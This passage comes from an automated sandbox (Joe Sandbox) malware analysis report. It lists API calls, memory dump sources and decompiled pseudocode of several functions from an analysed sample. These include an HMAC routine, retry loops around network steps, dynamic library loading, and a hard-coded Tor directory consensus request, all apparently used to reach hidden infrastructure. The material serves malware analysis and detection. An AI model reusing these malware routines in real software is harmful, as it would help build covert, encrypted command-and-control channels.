      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A57B1
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AEC77, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
    C-Code - Quality: 22%
    			E003AEC77(void* _a4, int _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
				void _v24;
				void _v44;
				void _v108;
				void _v172;
				char _v288;
				void* _t46;
				signed int _t70;
				void* _t74;
				void* _t82;
				void* _t86;

				memset( &_v108, 0, 0x40);
				memset( &_v172, 0, 0x40);
				memcpy( &_v108, _a4, _a8);
				memcpy( &_v172, _a4, _a8);
				_t46 = 0;
				do {
					 *(_t86 + _t46 - 0x68) =  *(_t86 + _t46 - 0x68) ^ 0x00000036;
					 *(_t86 + _t46 - 0xa8) =  *(_t86 + _t46 - 0xa8) ^ 0x0000005c;
					_t46 = _t46 + 1;
				} while (_t46 < 0x40);
				 *0x3b8ab4( &_v288, _t74, _t82);
				 *0x3b899c( &_v288,  &_v108, 0x40);
				 *0x3b899c( &_v288, _a12, _a16);
				 *0x3b8ab0( &_v288,  &_v24);
				_t70 = 5;
				memcpy( &_v44,  &_v24, _t70 << 2);
				 *0x3b8ab4( &_v288);
				 *0x3b899c( &_v288,  &_v172, 0x40);
				 *0x3b899c( &_v288,  &_v44, 0x14);
				 *0x3b8ab0( &_v288,  &_v24);
				_push(5);
				return memcpy(_a20,  &_v24, 0 << 2);
			}













    0x003aec88
    0x003aec98
    0x003aeca7
    0x003aecb9
    0x003aecc1
    0x003aecc3
    0x003aecc3
    0x003aecc8
    0x003aecd0
    0x003aecd1
    0x003aecdf
    0x003aecf2
    0x003aed05
    0x003aed16
    0x003aed1e
    0x003aed2c
    0x003aed2e
    0x003aed44
    0x003aed57
    0x003aed68
    0x003aed71
    0x003aed7c

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00397131, Relevance: 7.5, APIs: 5, Instructions: 49timethread
    C-Code - Quality: 100%
    			E00397131() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x3b8100; // 0x6c988642
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t32 == 0xbb40e64e || ( *0x3b8100 & 0xffff0000) == 0) {
						_t32 = 0xbb40e64f;
					}
					 *0x3b8100 = _t32;
					 *0x3b8104 =  !_t32;
					return _t22;
				} else {
					_t23 =  !_t14;
					 *0x3b8104 = _t23;
					return _t23;
				}
			}













    0x00397139
    0x0039713e
    0x00397142
    0x00397154
    0x00397168
    0x00397174
    0x0039717c
    0x00397184
    0x00397190
    0x00397199
    0x0039719c
    0x003971a0
    0x003971aa
    0x003971aa
    0x003971af
    0x003971b7
    0x00000000
    0x0039715a
    0x0039715a
    0x0039715c
    0x00000000
    0x0039715c

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397168
    • GetCurrentProcessId.KERNEL32 ref: 00397174
    • GetCurrentThreadId.KERNEL32 ref: 0039717C
    • GetTickCount.KERNEL32 ref: 00397184
    • QueryPerformanceCounter.KERNEL32(?), ref: 00397190
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0EB3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180
    C-Code - Quality: 97%
    			E003B0EB3(intOrPtr* __eax, void* __esi) {
				intOrPtr* _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t88;
				void* _t89;
				void* _t91;

				L0:
				while(1) {
					L0:
					_t83 = __esi;
					_t27 = __eax;
					_t59 =  *__eax;
					if(_t59 >= 0x30 && _t59 <= 0x39) {
						break;
					}
					L2:
					_t27 = _t27 + 1;
					if(_t27 < _t83) {
						continue;
					}
					break;
				}
				L3:
				_t60 = _t27;
				if(_t27 >= _t83) {
					L9:
					_t61 = _t60 - _t27;
					if(_t61 <= 6 || _t61 >= 0x10) {
						L35:
						_t28 =  *((intOrPtr*)(_t89 - 0x14));
						if( *((intOrPtr*)(_t89 - 0x14)) != 0) {
							E0039BB40(_t28);
							_t91 = _t91 + 4;
						}
						_t29 =  *((intOrPtr*)(_t89 - 0x10));
						if( *((intOrPtr*)(_t89 - 0x10)) != 0) {
							E0039BB40(_t29);
							_t91 = _t91 + 4;
						}
						_t30 =  *((intOrPtr*)(_t89 - 8));
						if( *((intOrPtr*)(_t89 - 8)) != 0) {
							E0039BB40(_t30);
							_t91 = _t91 + 4;
						}
						_t31 =  *((intOrPtr*)(_t89 - 0xc));
						if( *((intOrPtr*)(_t89 - 0xc)) != 0) {
							E0039BB40(_t31);
							_t91 = _t91 + 4;
						}
						_t32 =  *((intOrPtr*)(_t89 - 0x1c));
						if(_t32 != 0) {
							_push(_t32);
							L00391CB0();
						}
						_t33 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t33 + 0xac))))(0x3b8600);
						_t71 =  *0x3b8628; // 0x593938
						 *0x3b8618 =  *0x3b8618 - 1;
						 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0xc4))))(0x3b8600);
						return  *((intOrPtr*)(_t89 - 0x18));
					} else {
						_t42 = E00391170(_t27, 0, _t89 - 0x14, _t61);
						_t91 = _t91 + 0x10;
						if(_t42 == 0) {
							goto L35;
						} else {
							_t58 =  *((intOrPtr*)(_t89 + 0xc));
							_t85 = 0;
							while(L003994D0(_t58,  *((intOrPtr*)(_t89 - 0x14)), 0x1bb) == 0) {
								_t55 =  *0x3b8628; // 0x593938
								_t85 = _t85 + 1;
								 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xc8))))(0x7530);
								if(_t85 < 0x14) {
									continue;
								}
								break;
							}
							if(_t85 == 0x14) {
								goto L35;
							}
							_t86 = 0;
							 *((intOrPtr*)(_t89 - 4)) = 0;
							while(1) {
								_t45 = E0039D890(_t86, 0,  *((intOrPtr*)(_t89 + 8)), _t58, _t89 - 4);
								_t91 = _t91 + 0xc;
								if(_t45 == 0) {
									break;
								}
								_t69 =  *0x3b8628; // 0x593938
								_t86 = _t86 + 1;
								 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc8))))(0x7530);
								if(_t86 < 0x14) {
									continue;
								}
								L22:
								if(_t86 == 0x14) {
									goto L35;
								}
								_t80 =  *((intOrPtr*)(_t89 + 8));
								_t87 = 0;
								 *((intOrPtr*)(_t89 - 4)) = 0;
								while(1) {
									_t47 = E003A1B80(_t87, _t80, _t58, _t89 - 4);
									_t91 = _t91 + 0xc;
									if(_t47 == 0) {
										break;
									}
									_t67 =  *0x3b8628; // 0x593938
									_t87 = _t87 + 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0xc8))))(0x7530);
									if(_t87 < 0x14) {
										continue;
									}
									L29:
									if(_t87 == 0x14) {
										goto L35;
									}
									_t88 = 0;
									_t82 = _t58 + 8;
									while(1) {
										_t49 = E00391FE0(_t58, _t82, _t88,  *((intOrPtr*)(_t89 + 8)), _t58, _t82);
										_t91 = _t91 + 0xc;
										if(_t49 != 0) {
											break;
										}
										_t65 =  *0x3b8628; // 0x593938
										_t88 = _t88 + 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0xc8))))(0x7530);
										if(_t88 < 0x64) {
											continue;
										}
										break;
									}
									if(_t88 != 0x64) {
										 *((intOrPtr*)(_t89 - 0x18)) = 1;
									}
									goto L35;
								}
								_t81 =  *((intOrPtr*)(_t89 - 4));
								__eflags = _t81;
								if(_t81 != 0) {
									E00391380(_t81);
									_push(_t81);
									L00391CB0();
									_t91 = _t91 + 4;
								}
								goto L29;
							}
							_t79 =  *((intOrPtr*)(_t89 - 4));
							__eflags = _t79;
							if(_t79 != 0) {
								E00392DE0(_t79);
								_push(_t79);
								L00391CB0();
								_t91 = _t91 + 4;
							}
							goto L22;
						}
					}
				} else {
					do {
						_t77 =  *_t60;
						if(_t77 < 0x30 || _t77 > 0x39) {
							if(_t77 != 0x2e) {
								goto L9;
							}
						}
						_t60 = _t60 + 1;
					} while (_t60 < _t83);
					goto L9;
				}
			}































    0x003b0eb3
    0x003b0eb3
    0x003b0eb3
    0x003b0eb3
    0x003b0eb3
    0x003b0eb3
    0x003b0eb8
    0x00000000
    0x00000000
    0x003b0ebf
    0x003b0ebf
    0x003b0ec2
    0x00000000
    0x00000000
    0x00000000
    0x003b0ec2
    0x003b0ec4
    0x003b0ec4
    0x003b0ec8
    0x003b0ee6
    0x003b0ee6
    0x003b0eeb
    0x003b1037
    0x003b1037
    0x003b103f
    0x003b1042
    0x003b1047
    0x003b1047
    0x003b104a
    0x003b104f
    0x003b1052
    0x003b1057
    0x003b1057
    0x003b105a
    0x003b105f
    0x003b1062
    0x003b1067
    0x003b1067
    0x003b106a
    0x003b106f
    0x003b1072
    0x003b1077
    0x003b1077
    0x003b107a
    0x003b107f
    0x003b1081
    0x003b1082
    0x003b1087
    0x003b108a
    0x003b109a
    0x003b109c
    0x003b10a2
    0x003b10b3
    0x003b10bb
    0x003b0efa
    0x003b0f02
    0x003b0f07
    0x003b0f0c
    0x00000000
    0x003b0f12
    0x003b0f12
    0x003b0f15
    0x003b0f17
    0x003b0f2b
    0x003b0f3b
    0x003b0f3c
    0x003b0f41
    0x00000000
    0x00000000
    0x00000000
    0x003b0f41
    0x003b0f46
    0x00000000
    0x00000000
    0x003b0f4c
    0x003b0f4e
    0x003b0f51
    0x003b0f5a
    0x003b0f5f
    0x003b0f64
    0x00000000
    0x00000000
    0x003b0f66
    0x003b0f77
    0x003b0f78
    0x003b0f7d
    0x00000000
    0x00000000
    0x003b0f98
    0x003b0f9b
    0x00000000
    0x00000000
    0x003b0fa1
    0x003b0fa4
    0x003b0fa6
    0x003b0fb0
    0x003b0fb6
    0x003b0fbb
    0x003b0fc0
    0x00000000
    0x00000000
    0x003b0fc2
    0x003b0fd3
    0x003b0fd4
    0x003b0fd9
    0x00000000
    0x00000000
    0x003b0ff4
    0x003b0ff7
    0x00000000
    0x00000000
    0x003b0ff9
    0x003b0ffb
    0x003b1000
    0x003b1006
    0x003b100b
    0x003b1010
    0x00000000
    0x00000000
    0x003b1012
    0x003b1023
    0x003b1024
    0x003b1029
    0x00000000
    0x00000000
    0x00000000
    0x003b1029
    0x003b102e
    0x003b1030
    0x003b1030
    0x00000000
    0x003b102e
    0x003b0fdd
    0x003b0fe0
    0x003b0fe2
    0x003b0fe6
    0x003b0feb
    0x003b0fec
    0x003b0ff1
    0x003b0ff1
    0x00000000
    0x003b0fe2
    0x003b0f81
    0x003b0f84
    0x003b0f86
    0x003b0f8a
    0x003b0f8f
    0x003b0f90
    0x003b0f95
    0x003b0f95
    0x00000000
    0x003b0f86
    0x003b0f0c
    0x003b0ed0
    0x003b0ed0
    0x003b0ed0
    0x003b0ed5
    0x003b0edf
    0x00000000
    0x00000000
    0x003b0edf
    0x003b0ee1
    0x003b0ee2
    0x00000000
    0x003b0ed0

    APIs
      • Part of subcall function 0039D890: ??2@YAPAXI@Z.MSVCRT ref: 0039D8EA
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D929
      • Part of subcall function 0039D890: _time64.MSVCRT ref: 0039D94B
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D97B
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0F90
      • Part of subcall function 003A1B80: ??2@YAPAXI@Z.MSVCRT ref: 003A1BAF
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1BEE
      • Part of subcall function 003A1B80: _time64.MSVCRT ref: 003A1C10
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1C3D
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0FEC
      • Part of subcall function 00391FE0: ??2@YAPAXI@Z.MSVCRT ref: 00392024
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920A1
      • Part of subcall function 00391FE0: _time64.MSVCRT ref: 003920D2
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920F9
    • ??3@YAXPAX@Z.MSVCRT ref: 003B1082
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A0ED0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130
    C-Code - Quality: 75%
    			E003A0ED0(intOrPtr _a4, intOrPtr _a8, void** _a12, int* _a16, intOrPtr* _a20) {
				char _v8;
				char _v12;
				void* _v16;
				void* _v20;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t55;
				short* _t57;
				intOrPtr _t58;
				void* _t59;
				void* _t60;
				int _t62;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t79;
				signed int _t82;
				intOrPtr* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;

				_t62 = 0;
				_t77 = _a4;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				if(_t77 != 0) {
					_t42 = E00391170(_t77, 0,  &_v12, _a8);
					_t87 = _t86 + 0x10;
					if(_t42 == 0) {
						goto L1;
					} else {
						_t45 = E00397B80(_v12, 0x3b3310,  &_v8, 6);
						_t88 = _t87 + 0x10;
						_a4 = _t45;
						if(_t45 == 6) {
							_t12 = _v8 + 0x10; // 0xeb000060
							_t83 = __imp___wtoi;
							_t62 =  *_t83( *_t12);
							_t14 = _v8 + 0xc; // 0xc2e8cf8b
							_t55 =  *_t83( *_t14);
							_t88 = _t88 + 8;
							 *_a20 = _t55;
							if(_t62 != 0) {
								_t17 = _v8 + 0x14; // 0x24558b23
								_t57 =  *_t17;
								if( *_t57 == 0xd &&  *((short*)(_t57 + 2)) == 0xa) {
									_t84 = _t77 + 1;
									_t79 = 0;
									goto L8;
									L8:
									_t58 =  *0x3b8628; // 0x593938
									_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc))))( *((intOrPtr*)(_t79 + _v8)));
									_t79 = _t79 + 4;
									_t84 = _t84 + _t59 + 1;
									if(_t79 < 0x14) {
										goto L8;
									} else {
										_t85 = _t84 + 2;
										if( *((char*)(_t85 + _t62)) == 0xd &&  *((char*)(_t85 + _t62 + 1)) == 0xa) {
											_t60 = E003A1D90(_t62, 0);
											_t88 = _t88 + 8;
											_v16 = _t60;
											if(_t60 != 0) {
												memcpy(_t60, _t85, _t62);
												_t88 = _t88 + 0xc;
												_v20 = 1;
											}
										}
									}
								}
							}
						}
						_t46 = _v12;
						if(_v12 != 0) {
							E0039BB40(_t46);
							_t88 = _t88 + 4;
						}
						if(_v8 != 0) {
							_t78 = _a4;
							_t82 = 0;
							if(_t78 > 0) {
								do {
									E0039BB40( *((intOrPtr*)(_v8 + _t82 * 4)));
									_t82 = _t82 + 1;
									_t88 = _t88 + 4;
								} while (_t82 < _t78);
							}
							E0039BB40(_v8);
						}
						 *_a12 = _v16;
						 *_a16 = _t62;
						return _v20;
					}
				} else {
					L1:
					return 0;
				}
			}

























    0x003a0ed7
    0x003a0eda
    0x003a0edd
    0x003a0ee0
    0x003a0ee3
    0x003a0ee6
    0x003a0eeb
    0x003a0f01
    0x003a0f06
    0x003a0f0b
    0x00000000
    0x003a0f0d
    0x003a0f1d
    0x003a0f22
    0x003a0f25
    0x003a0f2b
    0x003a0f34
    0x003a0f37
    0x003a0f40
    0x003a0f45
    0x003a0f49
    0x003a0f4e
    0x003a0f51
    0x003a0f55
    0x003a0f5a
    0x003a0f5a
    0x003a0f61
    0x003a0f6a
    0x003a0f6d
    0x003a0f6d
    0x003a0f70
    0x003a0f76
    0x003a0f7f
    0x003a0f81
    0x003a0f84
    0x003a0f8b
    0x00000000
    0x003a0f8d
    0x003a0f8d
    0x003a0f94
    0x003a0fa0
    0x003a0fa5
    0x003a0fa8
    0x003a0fad
    0x003a0fb4
    0x003a0fb9
    0x003a0fbc
    0x003a0fbc
    0x003a0fad
    0x003a0f94
    0x003a0f8b
    0x003a0f61
    0x003a0f55
    0x003a0fc3
    0x003a0fc8
    0x003a0fcb
    0x003a0fd0
    0x003a0fd0
    0x003a0fd7
    0x003a0fd9
    0x003a0fdc
    0x003a0fe0
    0x003a0fe2
    0x003a0fe9
    0x003a0fee
    0x003a0fef
    0x003a0ff2
    0x003a0fe2
    0x003a0ffa
    0x003a0fff
    0x003a100c
    0x003a1012
    0x003a1018
    0x003a1018
    0x003a0eee
    0x003a0eee
    0x003a0ef4
    0x003a0ef4

    APIs
    • _wtoi.MSVCRT ref: 003A0F3E
    • _wtoi.MSVCRT ref: 003A0F49
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 003A0FB4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A4FF4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
    C-Code - Quality: 29%
    			E003A4FF4(intOrPtr __eax) {
				void* _t12;
				void* _t13;
				char* _t21;
				void* _t24;
				void* _t34;
				char* _t42;
				char* _t45;
				void* _t47;
				intOrPtr* _t49;

				_pop(_t34);
				 *((intOrPtr*)(_t49 + 0x20)) = __eax;
				_t52 = __eax;
				if(__eax == 0) {
					L7:
					_t12 = 0;
				} else {
					_t33 = _t49 + 0x20;
					_t13 = E003A4054(_t49 + 0x20, _t52);
					_t53 = _t13;
					if(_t13 == 0 || E003A3EE9(_t33, _t34, _t53) == 0) {
						L6:
						E003AFF10( *((intOrPtr*)(_t49 + 0x20)));
						goto L7;
					} else {
						 *((intOrPtr*)(_t49 + 0x14)) = 0x10;
						__imp__#5( *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x28)))), _t49 + 0x14, _t49 + 0xc);
						_t45 =  *0x3b8538(0x200);
						 *_t49 = 0x400000;
						_t21 =  *0x3b8538();
						_t42 = _t21;
						__imp__#12( *((intOrPtr*)(_t49 + 0x14)));
						sprintf(_t45, "GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0\r\nHost: %s\r\n\r\n", _t21);
						_t24 = E003A4BDF(_t33, _t45, _t42,  *((intOrPtr*)(_t47 + 8)));
						_t49 = _t49 + 0x1c;
						if(_t24 == 0 || E003A4DC1(_t42) == 0) {
							 *0x3b8540(_t42);
							 *0x3b8540(_t45);
							goto L6;
						} else {
							 *0x3b8540(_t42);
							 *0x3b8540(_t45);
							E003AFF10( *((intOrPtr*)(_t49 + 0x24)));
							_t12 = 1;
							__eflags = 1;
						}
					}
				}
				return _t12;
			}












    0x003a4ff4
    0x003a4ff5
    0x003a4ff9
    0x003a4ffb
    0x003a50ae
    0x003a50ae
    0x003a5001
    0x003a5001
    0x003a5005
    0x003a500a
    0x003a500c
    0x003a50a5
    0x003a50a9
    0x00000000
    0x003a5021
    0x003a502f
    0x003a5039
    0x003a504a
    0x003a504c
    0x003a5053
    0x003a505e
    0x003a5060
    0x003a506d
    0x003a507e
    0x003a5083
    0x003a5088
    0x003a5096
    0x003a509e
    0x00000000
    0x003a50b2
    0x003a50b3
    0x003a50bb
    0x003a50c6
    0x003a50cd
    0x003a50cd
    0x003a50cd
    0x003a5088
    0x003a500c
    0x003a50d4

    APIs
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A40B3
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4122
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4165
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A4054: htonl.WS2_32(00000000), ref: 003A41C5
      • Part of subcall function 003A4054: getpeername.WS2_32(?,?,?), ref: 003A41EA
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A4226
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4233
    • getpeername.WS2_32(?), ref: 003A5039
    • inet_ntoa.WS2_32(?), ref: 003A5060
    • sprintf.MSVCRT ref: 003A506D
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C61
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C80
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C90
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D4B
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D68
      • Part of subcall function 003A4BDF: sscanf.MSVCRT ref: 003A4D70
      • Part of subcall function 003A4DC1: strtok.MSVCRT ref: 003A4E04
      • Part of subcall function 003A4DC1: strtok.MSVCRT ref: 003A4E0B
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E3F
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E60
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E76
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E8C
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4EA2
      • Part of subcall function 003A4DC1: sscanf.MSVCRT ref: 003A4ED4
      • Part of subcall function 003A4DC1: sprintf.MSVCRT ref: 003A4EFB
      • Part of subcall function 003A4DC1: sscanf.MSVCRT ref: 003A4F43
      • Part of subcall function 003A4DC1: strtok.MSVCRT ref: 003A4F88
      • Part of subcall function 003AFF10: closesocket.WS2_32(?), ref: 003AFF12
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F19
      • Part of subcall function 003A3EE9: htons.WS2_32(00000000), ref: 003A3F31
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3EE9: htons.WS2_32(?), ref: 003A3FB2
    Strings
    • GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0Host: %s, xrefs: 003A5067
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AEA68, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31network
    C-Code - Quality: 16%
    			E003AEA68(char* _a4, intOrPtr* _a8, short* _a12) {
				char _v8;
				char _v24;
				short _t11;

				if(sscanf(_a4, "%15[^:]:%d",  &_v24,  &_v8) == 2) {
					_t11 =  &_v24;
					__imp__#11(_t11);
					 *_a8 = _t11;
					if(_t11 == 0xffffffff) {
						goto L1;
					} else {
						__imp__#9(_v8);
						 *_a12 = _t11;
						return 1;
					}
				} else {
					L1:
					return 0;
				}
			}






    0x003aea8a
    0x003aea90
    0x003aea94
    0x003aea9d
    0x003aeaa2
    0x00000000
    0x003aeaa4
    0x003aeaa7
    0x003aeab0
    0x003aeab7
    0x003aeab7
    0x003aea8c
    0x003aea8c
    0x003aea8f
    0x003aea8f

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
